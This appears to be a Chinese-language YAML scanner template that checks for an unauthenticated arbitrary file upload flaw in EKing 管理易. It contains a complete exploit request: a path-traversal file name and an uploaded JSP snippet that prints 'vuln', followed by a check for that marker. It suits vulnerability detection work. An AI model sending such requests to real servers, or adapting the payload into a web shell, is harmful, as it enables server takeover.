37 lines
1.4 KiB
YAML
37 lines
1.4 KiB
YAML
keyword: eking
|
|
name: EKing管理易任意文件上传漏洞
|
|
description: |
|
|
eking管理易FileUpload接口存在任意文件上传漏洞
|
|
requests: # 为空代表默认或者不启用
|
|
path: "/app/FileUpload.ihtm?comm_type=EKING&file_name=../../gm.jsp."
|
|
method: POST
|
|
headers:
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
|
|
Content-Length:
|
|
Accept:
|
|
Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6
|
|
Accept-Encoding:
|
|
Cookie:
|
|
Referer:
|
|
X-Forwarded-For:
|
|
body-raw: |-
|
|
--WebKitFormBoundaryHHaZAYecVOf5sfa6--
|
|
Content-Disposition: form-data; name="uplo_file"; filename="gm.jpg"
|
|
|
|
<% out.println("vuln");%>
|
|
--WebKitFormBoundaryHHaZAYecVOf5sfa6--
|
|
|
|
response:
|
|
path: "/gm.jsp" # 不填则默认接收此请求的响应包
|
|
status-code: 200
|
|
body: "vuln" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
|
|
time: # 此处填写响应包响应时间,默认不启用
|
|
headers:
|
|
Server:
|
|
Content-type:
|
|
Content-length:
|
|
Date:
|
|
Connection:
|
|
impact: |
|
|
EKing-管理易 FileUpload.ihtm 接口处存在文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
|